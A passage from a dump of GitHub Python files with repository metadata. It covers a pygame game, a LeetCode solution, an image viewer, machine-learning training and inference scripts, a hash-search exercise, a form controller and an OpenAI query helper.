screen.blit(self.scoreText,(400,30))\n screen.blit(self.highScoreText,(400,10))\n pygame.draw.rect(screen,(0,0,0),(0,390,600,10))\n pygame.draw.rect(screen,(0,0,0),(100,70,400,20),2)\n pygame.draw.rect(screen,(0,0,0),(100,70,self.gauge,20))\n self.drawLife(screen)\n self.buildings.draw(screen)\n self.houses.draw(screen)\n self.humans.draw(screen)\n self.missileList.draw(screen)\n if self.drawBeam:\n pygame.draw.lines(screen,(0,0,0),False,\\\n [(self.player.x+self.ufoSize,self.player.y+self.ufoSize),\\\n (self.player.x+self.ufoSize+30,\\\n self.player.y+self.ufoSize+190)],4)\n pygame.draw.lines(screen,(0,0,0),False,\\\n [(self.player.x-30,self.player.y+self.ufoSize+190),\\\n (self.player.x,self.player.y+self.ufoSize)],4)\n if self.pause:\n screen.blit(self.text,(self.textCoords))\n\n ","repo_name":"hirokoa9/Term-Project","sub_path":"gamePlay.py","file_name":"gamePlay.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"70047042355","text":"import time\r\n\r\n\r\nclass Solution:\r\n def numUniqueEmails(self, emails: [str]) -> int:\r\n if not emails:\r\n return 0\r\n addrs = set()\r\n for email in emails:\r\n addr = email.split('@')\r\n local_name = addr[0].split('+')\r\n local_name = local_name[0].replace('.', '')\r\n addrs.add(local_name + '@' + addr[-1])\r\n return len(addrs)\r\n\r\n\r\n def numUniqueEmails(self, emails: [str]) -> int:\r\n if not emails:\r\n return 0\r\n \r\n accounts = set()\r\n for email in emails:\r\n account, domain = email.split('@')\r\n idx = account.find('+')\r\n if -1 != idx:\r\n account = account[:idx]\r\n account = account.replace('.', '')\r\n accounts.add(account + '@' + domain)\r\n\r\n return len(accounts)\r\n\r\n def numUniqueEmails(self, emails: [str]) -> int:\r\n kinds = set()\r\n for email in emails:\r\n local, domain = email.split('@')\r\n idx = local.find('+')\r\n if -1 != idx:\r\n local = local[:idx]\r\n local = local.replace('.', '')\r\n kinds.add(local + '@' + domain)\r\n\r\n return len(kinds)\r\n\r\n\r\nstime = time.time()\r\n#print(2 == Solution().numUniqueEmails([\"test.email+alex@leetcode.com\",\"test.e.mail+bob.cathy@leetcode.com\",\"testemail+david@lee.tcode.com\"]))\r\nprint(2 == Solution().numUniqueEmails([\"test.email+alex@leetcode.com\",\"test.email.leet+alex@code.com\"]))\r\n\r\nprint('elapse time: {} sec'.format(time.time() - stime))","repo_name":"roiei/algo","sub_path":"leet_code/929. Unique Email Addresses.py","file_name":"929. 
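The movement handling in the `gamePlay.py` entry above guards each direction with a pre-check (`if self.player.x>0`, and so on). Clamping after the move is an equivalent pattern that also survives overshoot when one step is larger than the distance to the edge. A standalone sketch using the same bounds that appear in the record (x in [0, 600 - sprite], y in [65, 300 - sprite]); the variable names here are illustrative:

def clamp(value, lo, hi):
    return max(lo, min(hi, value))

ufo_size, speed = 80, 5
x, y = 595, 64
x = clamp(x + speed, 0, 600 - ufo_size)   # right edge: 600 minus sprite width
y = clamp(y - speed, 65, 300 - ufo_size)  # playfield top is y = 65
print(x, y)  # 520 65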
Unique Email Addresses.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"23907349008","text":"#!/usr/bin/env python\n\nimport Image\n\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n\ndef view(ims, names = None):\n import pygame\n pygame.init()\n\n sw, sh = pygame.display.list_modes()[0]\n\n im = ims[0]\n width,height = im.size\n\n # Target size is 90% of sw\n zf = min(0.9 * sw / im.size[0], 0.6 * sh / im.size[1])\n\n ww = int(width * zf)\n size = width * zf,height * zf\n y0 = int(height * zf)\n y1 = int(height * zf + 40)\n\n screen = pygame.display.set_mode((ww, y1 + ww))\n\n fo = pygame.font.SysFont(\"freemono\", 20)\n\n pygame.key.set_repeat(300, 50)\n\n screen.fill(black)\n def mainpic(im):\n b = pygame.image.fromstring(im.convert(\"RGB\").tostring(), im.size, \"RGB\")\n return pygame.transform.scale(b, (int(zf * width), int(zf * height)))\n mp = mainpic(im)\n\n def announce(ss):\n for i,s in enumerate(ss):\n msg = fo.render(s, False, (255,255,255,128), (0,0,0,128))\n screen.blit(msg, (0, y0 + 20 * i))\n del msg\n\n (x, y) = (0, 0)\n (px, py) = (None, None)\n z = 7\n redraw = True\n while True:\n if redraw:\n screen.blit(mp, (0,0))\n if x < im.size[0] and y < im.size[1]:\n pixel = im.getpixel((x, y))\n if len(pixel) == 3:\n (r, g, b) = pixel\n a = 255\n elif len(pixel) == 4:\n (r, g, b, a) = pixel\n if names is None:\n fn = str(ims.index(im))\n else:\n fn = names[ims.index(im)]\n pixval = \" \".join([\"%s=%02x\" % (c, v) for (c, v) in zip(im.mode, pixel)])\n announce([\"xy=%4d,%4d (%d %d) %-16s\" % (x, y, im.size[0], im.size[1], fn),\n pixval + \" \"])\n sub = im.crop((x - z/2, y - z/2, x + 1 + z/2, y + 1 + z/2))\n imsub = pygame.transform.scale(pygame.image.fromstring(sub.convert(\"RGB\").tostring(), sub.size, \"RGB\"), (ww, ww))\n screen.blit(imsub, (0, y1))\n for i in range(1, z):\n pygame.draw.line(screen, black, (0, y1 + ww * i / z), (ww, y1 + ww * i / z))\n pygame.draw.line(screen, black, (ww * i / z, y1), (ww * i / z, y1 + ww))\n x0 = ww * (z / 2) / z\n x1 = ww * (z / 2 + 1) / z\n corners = [\n (x0, y1 + x0),\n (x1, y1 + x0),\n (x1, y1 + x1),\n (x0, y1 + x1)]\n pygame.draw.lines(screen, white, True, corners, 2)\n (px, py) = (x, y)\n pygame.display.flip()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n if event.type == pygame.KEYDOWN:\n if event.key == 27 or event.key == ord('q'):\n pygame.display.quit()\n return\n if event.key == ord(' '):\n i = ims.index(im)\n i = (i + 1) % len(ims)\n im = ims[i]\n mp = mainpic(im)\n redraw = True\n if event.key == ord('-'):\n z += 2\n redraw = True\n if event.key == ord('='):\n z -= 2\n redraw = True\n if event.type == pygame.MOUSEMOTION:\n (x, y) = [int(c / zf) for c in event.pos]\n if (x, y) != (px, py):\n redraw = True\n\nif __name__ == '__main__':\n import sys\n ims = [Image.open(a) for a in sys.argv[1:]]\n view(ims, sys.argv[1:])\n","repo_name":"jamesbowman/mysettings","sub_path":"iv.py","file_name":"iv.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"28204387215","text":"import joblib\nfrom random import randint\nfrom matplotlib import pyplot\nimport numpy as np\nfrom dataset import load_dataset\n\n# Idea\n# 1. load datasets\n# 2. load model\n# 3. pick a random image from test dataset\n# 4. 
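The unique-email entry above implements the same canonicalization three times; a compact equivalent for reference (illustrative, not from the repo): drop everything after '+', strip '.' from the local part, keep the domain untouched.

def canonical(email: str) -> str:
    local, _, domain = email.partition('@')
    local = local.split('+', 1)[0].replace('.', '')
    return local + '@' + domain

emails = ["test.email+alex@leetcode.com", "test.email.leet+alex@code.com"]
print(len({canonical(e) for e in emails}))  # 2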
predict\n\nTRAIN_X = 'train_x.npz'\nTRAIN_Y = 'train_y.npz'\nTEST_X = 'test_x.npz'\nTEST_Y = 'test_y.npz'\nMODAL_NAME = 'operators_svm_model.gz'\n\ndef load_test_dataset():\n \"\"\" \n load and returns testing dataset and labels \n returns : test_x, test_y (all numpy arrays)\n \"\"\"\n test_x = load_dataset(TEST_X)\n test_y = load_dataset(TEST_Y)\n return test_x, test_y\n\ndef pre_processing(test_x):\n \"\"\" \n process test_x by convering int to float & normalizing pixels values to the range on 0-1 \n parameters : test_x (numpy array)\n returns : test_norm (numpy array)\n \"\"\"\n test_norm = test_x.astype('float32')\n test_norm = test_norm / 255.0\n return test_norm\n\ndef main():\n test_x, test_y = load_test_dataset()\n test_x = pre_processing(test_x)\n\n index = randint(0,test_x.shape[0])\n \n classifier = joblib.load(MODAL_NAME)\n result = classifier.predict([test_x[index]])\n \n # converting a 1d array array to 2d array\n image_1d = np.array(test_x[index])\n image_2d = image_1d.reshape(28,28)\n pyplot.imshow(image_2d)\n \n print('actual :',test_y[index])\n print('predicted :',result[0])\n\nif __name__ == \"__main__\" :\n main()","repo_name":"nithyashrie/CAPSTONE","sub_path":"src/operators/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5628016217","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport argparse\r\nimport PIL.Image\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\n\r\nimport torch\r\nfrom torchvision import transforms\r\nfrom torch.utils.data import Dataset\r\nfrom torch.utils.data import DataLoader\r\n\r\nimport architecture as models\r\nfrom utils.util import save_result_image\r\nfrom utils.util_loc import get_cam_target_class, resize_threshold_cam\r\n\r\n\r\nIMAGE_MEAN_VALUE = [0.485, 0.456, 0.406]\r\nIMAGE_STD_VALUE = [0.229, 0.224, 0.225]\r\n\r\n\r\nmodel_names = sorted(name for name in models.__dict__\r\n if name.islower() and not name.startswith(\"__\")\r\n and callable(models.__dict__[name]))\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\r\n parser.add_argument('--log-folder', type=str, default='train_log')\r\n parser.add_argument('--data', help='path to dataset')\r\n parser.add_argument('--arch', choices=model_names)\r\n parser.add_argument('-b', '--batch-size', default=32, type=int)\r\n parser.add_argument('--resume', default=None, type=str)\r\n parser.add_argument('--gpu', default=0, type=int, help='GPU id to use.')\r\n\r\n parser.add_argument('--name', type=str, default='test_case')\r\n\r\n parser.add_argument('--dataset', type=str, default='PASCAL', )\r\n parser.add_argument('--test-list', type=str, default='./datalist/PascalVOC/val.txt')\r\n\r\n parser.add_argument('--resize-size', type=int, default=321, help='input resize size')\r\n args = parser.parse_args()\r\n\r\n return args\r\n\r\n\r\n\r\ndef main():\r\n args = get_args()\r\n if args.gpu is not None:\r\n print(\"Use GPU: {} for training\".format(args.gpu))\r\n\r\n num_classes = 20\r\n\r\n # Select Model & Method\r\n model = models.__dict__[args.arch](False, num_classes=num_classes)\r\n\r\n if args.gpu is not None:\r\n torch.cuda.set_device(args.gpu)\r\n model = model.cuda(args.gpu)\r\n\r\n # optionally resume from a checkpoint\r\n if args.resume:\r\n checkpoint = torch.load(args.resume)['state_dict']\r\n model.load_state_dict(checkpoint, strict=True)\r\n\r\n test_loader = data_loader(args)\r\n 
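The SVM `predict.py` entry above depends on a `load_dataset` helper whose internals are not shown; a sketch of the `.npz` round-trip it presumably performs (the array key 'x' and shapes here are assumptions), including the same normalize-then-reshape steps used before display:

import numpy as np

x = np.random.randint(0, 256, size=(10, 784), dtype=np.uint8)
np.savez('test_x.npz', x=x)

loaded = np.load('test_x.npz')['x']
norm = loaded.astype('float32') / 255.0   # mirrors pre_processing()
image = norm[0].reshape(28, 28)           # one flat row back to a 2-D image
print(image.shape, float(norm.min()), float(norm.max()))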
evaluate_test(test_loader, model, args)\r\n\r\n\r\ndef evaluate_test(val_loader, model, args):\r\n\r\n model.eval()\r\n with torch.no_grad():\r\n for i, (images, image_id, image_sizes) in enumerate(tqdm(val_loader, desc='Evaluate')):\r\n images = images.cuda(args.gpu, non_blocking=True)\r\n\r\n output = model(images)\r\n cam = get_cam_target_class(model)\r\n cam = cam.cpu().numpy().transpose(0, 2, 3, 1)\r\n\r\n for j in range(cam.shape[0]):\r\n cam_ = resize_threshold_cam(cam[j],\r\n size=(image_sizes[j][0].item(), image_sizes[j][1].item()),\r\n thresh=0.3)\r\n cam_max = np.argmax(cam_, axis=2)\r\n\r\n save_result_image('final_map', cam_max, image_id[j], args)\r\n\r\n\r\ndef data_loader(args):\r\n\r\n # transforms for validation dataset\r\n transforms_val = transforms.Compose([\r\n transforms.Resize((args.resize_size, args.resize_size)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(IMAGE_MEAN_VALUE, IMAGE_STD_VALUE),\r\n ])\r\n test_loader = DataLoader(\r\n VOCTestDataset(root=args.data, datalist=args.test_list, transform=transforms_val),\r\n batch_size=args.batch_size, shuffle=False, num_workers=4\r\n )\r\n return test_loader\r\n\r\n\r\nclass VOCTestDataset(Dataset):\r\n\r\n def __init__(self, root=None, datalist=None, transform=None):\r\n self.root = root\r\n datalist = open(datalist).read().splitlines()\r\n self.image_names = [img_gt_name.split(' ')[0][-15:-4] for img_gt_name in datalist]\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.image_names)\r\n\r\n def __getitem__(self, idx):\r\n name = self.image_names[idx]\r\n\r\n image_path = os.path.join(self.root, \"JPEGImages\", name + '.jpg')\r\n img = PIL.Image.open(image_path).convert(\"RGB\")\r\n img_size = img.size\r\n if self.transform:\r\n img = self.transform(img)\r\n\r\n return img, name, img_size\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bityangke/SW_Project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10697719330","text":"import hashlib\nimport string\nimport random\n\n\ndef id_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\nloop = True\ncount = 0\n\nprint(\"Υπολογίζεται ο μέσος όρος παρακαλώ περιμένετε...\")\nfor x in range(0, 19):\n\n loop = True\n while loop:\n result = hashlib.sha256(id_generator().encode('utf-8')).hexdigest()\n firstTwo = result[:2]\n lastThree = result[-3:]\n count += 1\n if firstTwo == \"a3\" and lastThree == \"fff\":\n loop = False\n\nprint(count / 20)\n","repo_name":"master1324/ergasia_python","sub_path":"askisi 7.py","file_name":"askisi 7.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"23425185330","text":"__author__ = 'Urokhtor'\n\nfrom Controllers.FormController import FormController\nfrom Tools.JSONFrontEndTool import JSONFrontEndTool as JFET\nfrom Tools.FrontEndElementTool import FrontEndElementTool as FEET\nfrom Tools.TypeMapper import TypeMapper\n\nimport json\n\nclass TaskManagementFormController(FormController):\n\n def handleRequest(parent, request, response):\n \"\"\"\n\n \"\"\"\n\n f = open(\"Conf/Website/taskmanagementform.json\", \"r\")\n tmp = json.load(f)\n f.close()\n\n tasks = parent.taskManager.getAll()\n\n if tasks is None: return 
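The hash-search entry above measures the average attempt count empirically (note that it runs `range(0, 19)`, i.e. 19 searches, yet divides the total by 20). The expected value follows directly from the five fixed hex characters: each attempt matches with probability 16**-5, so the mean is 16**5 = 1,048,576 attempts. An illustrative sketch (`trials_until_match` is my name; the expensive call is left commented out):

import hashlib
import itertools

def trials_until_match(prefix='a3', suffix='fff'):
    # SHA-256 output is effectively uniform over hex strings, so each
    # attempt matches the five fixed characters with probability 16**-5.
    for n in itertools.count(1):
        digest = hashlib.sha256(str(n).encode('utf-8')).hexdigest()
        if digest.startswith(prefix) and digest.endswith(suffix):
            return n

print(16 ** 5)  # 1048576 -- expected attempts per match
# print(trials_until_match())  # slow: roughly a million hashes on average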
json.dumps(tmp)\n\n task = None\n deviceId = None\n actionType = None\n\n if \"params\" in request and \"id\" in request[\"params\"]:\n task = parent.taskManager.getById(int(request[\"params\"][\"id\"]))\n\n if task:\n # Add the chosen sensor's data to the sensor info table.\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"taskName\"), \"value\", task[\"name\"])\n deviceId = task[\"deviceid\"]\n actionType = task[\"action\"]\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"taskEvents\"), \"value\", \" \".join(task[\"schedules\"]))\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"taskIsPermanent\"), \"checked\", task[\"ispermanent\"])\n taskId = JFET.findElementById(tmp[\"source\"], \"taskId\")\n JFET.addParameter(taskId, \"value\", str(task[\"id\"]))\n\n else:\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"taskIsPermanent\"), \"checked\", True)\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"removeSendbutton\"), \"disabled\", \"true\")\n\n taskDevice = JFET.findElementById(tmp[\"source\"], \"taskDevice\")\n FEET.createSelectMap(taskDevice, parent.deviceManager.getIdNameMap(), deviceId)\n\n taskAction = JFET.findElementById(tmp[\"source\"], \"taskAction\")\n FEET.createSelectMap(taskAction, TypeMapper.getTaskActionMap(), actionType)\n\n return json.dumps(tmp)\n\n def validate(parent, request, reject):\n form = request[\"params\"][\"form\"]\n form[\"taskAction\"] = int(form[\"taskAction\"])\n form[\"taskDevice\"] = int(form[\"taskDevice\"])\n if len(form[\"taskId\"]) > 0: form[\"taskId\"] = int(form[\"taskId\"])\n\n def handleSubmit(parent, request, response):\n form = request[\"params\"][\"form\"]\n\n if request[\"params\"][\"mode\"] == \"save\":\n name = form[\"taskName\"]\n taskType = \"write\"\n action = form[\"taskAction\"]\n device = form[\"taskDevice\"]\n isTemporary = form[\"taskIsPermanent\"]\n schedules = form[\"taskEvents\"]\n\n task = parent.taskManager.create(name, taskType, action, device, isTemporary, schedules)\n return json.dumps(parent.taskManager.insert(task))\n\n elif request[\"params\"][\"mode\"] == \"remove\":\n return json.dumps(parent.taskManager.remove(parent.taskManager.getById(form[\"taskId\"])))","repo_name":"Urokhtor/Naga-Automation-Suite","sub_path":"Naga Automation Suite/Controllers/TaskManagementFormController.py","file_name":"TaskManagementFormController.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10071277514","text":"from turtle import down, forward\nimport torch\nfrom torch import flatten, nn\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets #CIFAR,COCO...\nfrom torchvision.transforms import ToTensor, Lambda, Compose\nimport matplotlib.pyplot as plt\n\ntraining_data = datasets.FashionMNIST(\n root = \"data\",\n train = True,\n download = True,\n transform = ToTensor()\n)\n\ntest_data = datasets.FashionMNIST(\n root = \"data\",\n train = False,\n download = True,\n transform = ToTensor(),\n)\n\nprint(\":: Dataset allocate ::\")\n\nbatch_size = 64\n\n#Data Loader Create -> Dataste을 순환 가능한 객체로 만든다.\n\ntrain_dataloader = DataLoader(training_data, batch_size=batch_size)\ntest_dataloader = DataLoader(test_data, batch_size= batch_size)\n\n# print(\"======Iteration======\")\n# for X, y in test_dataloader:\n# print(\"Sahpe of X [N,C,H,W]: \", X.shape)\n# print(\"Shape of y: \", y.shape, y.dtype)\n# print(\"======End======\")\n\n#학습에 필요한 CPU, GPU 장치를 얻는다.\ndevice = \"cuda\" 
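The form controller above leans on `JFET.findElementById` to patch values into a JSON form template; its implementation is not included in the record. A hypothetical stand-in showing one way such a lookup can work, walking nested dicts and lists for a matching "id" (everything here is assumed, not the project's actual helper):

import json

def find_element_by_id(node, element_id):
    if isinstance(node, dict):
        if node.get('id') == element_id:
            return node
        node = list(node.values())
    if isinstance(node, list):
        for child in node:
            found = find_element_by_id(child, element_id)
            if found is not None:
                return found
    return None

form = json.loads('{"source": [{"id": "taskName", "value": ""}]}')
find_element_by_id(form, 'taskName')['value'] = 'Water the plants'
print(json.dumps(form))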
if torch.cuda.is_available() else \"cpu\"\nprint(f\"Using {device} device\")\n\n#모델 정의하기\nclass NeuralNetwork(nn.Module):\n def __init__(self):\n super(NeuralNetwork, self).__init__()\n self.flatten = nn.Flatten()\n self.linear_relu_stack = nn.Sequential(\n nn.Linear(28*28, 512),\n nn.ReLU(),\n nn.Linear(512, 512),\n nn.ReLU(),\n nn.Linear(512, 10)\n )\n\n def forward(self, x):\n x = self.flatten(x)\n logits = self.linear_relu_stack(x)\n return logits\n \nmodel = NeuralNetwork().to(device)\nprint(model)\n\n\n#모델 매개변수 최적화 하기\nloss_fn = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=1e-3)\n\ndef train(dataloader, model, loss_fn, optimizer):\n size = len(dataloader.dataset)\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n\n #예측 오류 계산\n pred = model(X)\n loss = loss_fn(pred, y)\n \n #역전파\n optimizer.zero_grad() #모델 매개변수의 변화도를 재설정, 기본적으로 변화도는 더해지기(add up) 때문에, 중복계산을 막기 위해서 반복할때마다 명시적으로 0으로 설정해야한다.\n loss.backward() #loss에 대한 requires_grad가 True인 변수의 변화량 값 계산.\n optimizer.step() #변화도를 계산한 뒤에 해당 함수를 호출하면 수집된 변화도로 매개변수를 조정한다.\n \n if batch % 100 == 0:\n loss, current = loss.item(), batch * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n\ndef test(dataloader, model, loss_fn):\n size = len(dataloader.dataset)\n num_batchs = len(dataloader)\n model.eval()\n test_loss, correct = 0,0\n with torch.no_grad(): #연산 중에서 gradient를 계산하는 기록 추적, 변화도 계산 지원이 필요 없는 경우 사용 (연산추적 중지)\n for X, y in dataloader:\n X,y = X.to(device), y.to(device)\n pred = model(X)\n test_loss += loss_fn(pred, y).item()\n correct += (pred.argmax(1) == y).type(torch.float).sum().item() #배치 안에 정답인 거 전부다 sum\n test_loss /= num_batchs\n correct /= size\n print(f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\n\n\nepoch = 10\nfor t in range(epoch):\n print(f\"Epoch {t+1}\\n------------------------\")\n train(train_dataloader, model, loss_fn, optimizer)\n test(test_dataloader, model, loss_fn)\nprint(\"Done!\")\n\n#모델 저장하기\ntorch.save(model.state_dict(), \"model.pth\")\nprint(\"Saved Pytorch Model State to model.pth\")\n\n#모델 불러오기\nmodel = NeuralNetwork()\nmodel.load_state_dict(torch.load(\"model.pth\"))\n\n\n#모델을 이용하여 예측\nclasses = [\n \"T-shirt/top\",\n \"Trouser\",\n \"Pullover\",\n \"Dress\",\n \"Coat\",\n \"Sandal\",\n \"Shirt\",\n \"Sneaker\",\n \"Bag\",\n \"Ankle boot\",\n]\n\nmodel.eval()\nx, y = test_data[0][0], test_data[0][1]\nwith torch.no_grad():\n pred = model(x)\n predicted, actual = classes[pred[0].argmax(0)], classes[y]\n print(f'Predicted: \"{predicted}\", Actual: \"{actual}\"')","repo_name":"gbjeong96/experimentset","sub_path":"Tutorial/QuickStart.py","file_name":"QuickStart.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72598144115","text":"import openai\nimport time\nimport threading\nfrom contextlib import contextmanager\n\n# get an openai api key from here: https://platform.openai.com/account/api-keys\nopenai.api_key = \"\"\n\ndef rm_return_doublequote(s):\n s = s.replace('\\n\\n', ' ')\n s = s.replace('\\n', ' ')\n s = s.replace('\\\"', '')\n return s.strip()\n\nclass TimeoutException(Exception):\n def __init__(self, msg=''):\n self.msg = msg\n\n@contextmanager\ndef time_limit(seconds, msg=''):\n \n timer = threading.Timer(seconds, lambda: _thread.interrupt_main())\n timer.start()\n try:\n yield\n except KeyboardInterrupt:\n raise TimeoutException(\"Timed out for operation {}\".format(msg))\n 
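The PyTorch quick-start entry above counts correct predictions with `(pred.argmax(1) == y).type(torch.float).sum().item()`. A standalone illustration of that bookkeeping on a tiny hand-made batch, so the argmax-over-classes comparison is easy to verify:

import torch

logits = torch.tensor([[2.0, 0.1, -1.0],
                       [0.0, 3.0,  0.5],
                       [1.0, 0.2,  0.3]])
labels = torch.tensor([0, 1, 2])
# argmax(1) picks the predicted class per row: here [0, 1, 0].
correct = (logits.argmax(1) == labels).type(torch.float).sum().item()
print(correct / len(labels))  # 0.666... -- the third sample is wrong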
finally:\n # if the action ends in specified time, timer is canceled\n timer.cancel()\n\n# engine selection:\n# optimized for dialogue: gpt-3.5-turbo\t\n# single-turn instructions: text-davinci-003\n# expert model but expensive: gpt-4\ndef query_openai(inputs_with_prompts, \n engine='text-davinci-002', # $0.0200 / 1K tokens\n max_tokens=500, \n num_sequence=1, \n temp=0,\n retry=2):\n \n completions = {\"choices\": []}\n complete = False\n for i in range(retry):\n try:\n with time_limit(20, 'run gpt-3'):\n completions = openai.Completion.create(\n engine=engine, \n max_tokens=max_tokens, \n prompt=inputs_with_prompts, \n temperature=temp, \n n=num_sequence, # num of returned sequence\n )\n complete = True\n break\n except:\n time.sleep(2)\n if not complete:\n return False\n\n outputs = [c[\"text\"] for c in completions[\"choices\"]]\n \n return outputs\n \ndef answer_question(question, simulation_data, retry=2):\n \n numFails = 0\n while numFails < retry:\n ret = query_openai(f'Read the following json format file and reply the question. \\n\\n question: {question} \\n\\n simulation: {simulation_data}')\n if ret == False:\n numFails += 1\n else:\n break\n if ret == False:\n return f'Due to API limitations, please reduce the number of simulation rounds when asking questions as the simulated data has exceeded the cache capacity.'\n \n if type(ret) == list:\n ret = ret[0]\n \n ret = rm_return_doublequote(ret)\n return ret\n \nif __name__ == '__main__':\n simulation_data = \"{\\\n \\\"simulation_1\\\": [\\\n {\\\"time\\\": \\\"0\\\", \\\"speed\\\": \\\"0\\\"},\\\n {\\\"time\\\": \\\"1\\\", \\\"speed\\\": \\\"30\\\"},\\\n {\\\"time\\\": \\\"2\\\", \\\"speed\\\": \\\"60\\\"},\\\n {\\\"time\\\": \\\"3\\\", \\\"speed\\\": \\\"90\\\"},\\\n {\\\"time\\\": \\\"4\\\", \\\"speed\\\": \\\"120\\\"},\\\n {\\\"time\\\": \\\"5\\\", \\\"speed\\\": \\\"150\\\"},\\\n {\\\"time\\\": \\\"6\\\", \\\"speed\\\": \\\"180\\\"},\\\n {\\\"time\\\": \\\"7\\\", \\\"speed\\\": \\\"210\\\"},\\\n {\\\"time\\\": \\\"8\\\", \\\"speed\\\": \\\"240\\\"},\\\n {\\\"time\\\": \\\"9\\\", \\\"speed\\\": \\\"270\\\"},\\\n {\\\"time\\\": \\\"10\\\", \\\"speed\\\": \\\"300\\\"},\\\n {\\\"time\\\": \\\"11\\\", \\\"speed\\\": \\\"330\\\"},\\\n {\\\"time\\\": \\\"12\\\", \\\"speed\\\": \\\"360\\\"},\\\n {\\\"time\\\": \\\"13\\\", \\\"speed\\\": \\\"390\\\"},\\\n {\\\"time\\\": \\\"14\\\", \\\"speed\\\": \\\"420\\\"}\\\n ],\\\n \\\"simulation_2\\\": [\\\n {\\\"time\\\": \\\"0\\\", \\\"speed\\\": \\\"0\\\"},\\\n {\\\"time\\\": \\\"1\\\", \\\"speed\\\": \\\"40\\\"},\\\n {\\\"time\\\": \\\"2\\\", \\\"speed\\\": \\\"80\\\"},\\\n {\\\"time\\\": \\\"3\\\", \\\"speed\\\": \\\"120\\\"},\\\n {\\\"time\\\": \\\"4\\\", \\\"speed\\\": \\\"160\\\"},\\\n {\\\"time\\\": \\\"5\\\", \\\"speed\\\": \\\"200\\\"},\\\n {\\\"time\\\": \\\"6\\\", \\\"speed\\\": \\\"240\\\"},\\\n {\\\"time\\\": \\\"7\\\", \\\"speed\\\": \\\"280\\\"},\\\n {\\\"time\\\": \\\"8\\\", \\\"speed\\\": \\\"320\\\"},\\\n {\\\"time\\\": \\\"9\\\", \\\"speed\\\": \\\"360\\\"},\\\n {\\\"time\\\": \\\"10\\\", \\\"speed\\\": \\\"400\\\"},\\\n {\\\"time\\\": \\\"11\\\", \\\"speed\\\": \\\"440\\\"},\\\n {\\\"time\\\": \\\"12\\\", \\\"speed\\\": \\\"480\\\"},\\\n {\\\"time\\\": \\\"13\\\", \\\"speed\\\": \\\"520\\\"},\\\n {\\\"time\\\": \\\"14\\\", \\\"speed\\\": \\\"560\\\"}\\\n ],\\\n \\\"simulation_3\\\": [\\\n {\\\"time\\\": \\\"0\\\", \\\"speed\\\": \\\"0\\\"},\\\n {\\\"time\\\": \\\"1\\\", \\\"speed\\\": \\\"50\\\"},\\\n {\\\"time\\\": \\\"2\\\", \\\"speed\\\": \\\"100\\\"},\\\n 
{\\\"time\\\": \\\"3\\\", \\\"speed\\\": \\\"150\\\"},\\\n {\\\"time\\\": \\\"4\\\", \\\"speed\\\": \\\"200\\\"},\\\n {\\\"time\\\": \\\"5\\\", \\\"speed\\\": \\\"250\\\"},\\\n {\\\"time\\\": \\\"6\\\", \\\"speed\\\": \\\"300\\\"},\\\n {\\\"time\\\": \\\"7\\\", \\\"speed\\\": \\\"350\\\"},\\\n {\\\"time\\\": \\\"8\\\", \\\"speed\\\": \\\"400\\\"},\\\n {\\\"time\\\": \\\"9\\\", \\\"speed\\\": \\\"450\\\"},\\\n {\\\"time\\\": \\\"10\\\", \\\"speed\\\": \\\"500\\\"},\\\n {\\\"time\\\": \\\"11\\\", \\\"speed\\\": \\\"550\\\"},\\\n {\\\"time\\\": \\\"12\\\", \\\"speed\\\": \\\"600\\\"},\\\n {\\\"time\\\": \\\"13\\\", \\\"speed\\\": \\\"650\\\"},\\\n {\\\"time\\\": \\\"14\\\", \\\"speed\\\": \\\"700\\\"}\\\n ]\\\n }\"\n print(answer_question('List the average of maximum speed in recent three runs.', simulation_data))\n # answer should be \"The average of maximum speed in recent three runs is 400.\"\n \n \n","repo_name":"weilun-chiu/gpt-3.5-turbo-instruct-story-generation","sub_path":"story_generator.py","file_name":"story_generator.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"5882250897","text":"from sys import version_info, exit\nfrom setuptools import setup, find_packages\nfrom os import path\n\nif version_info[0] < 3 and version_info[1] < 5:\n exit(\"Sorry, support only for Python 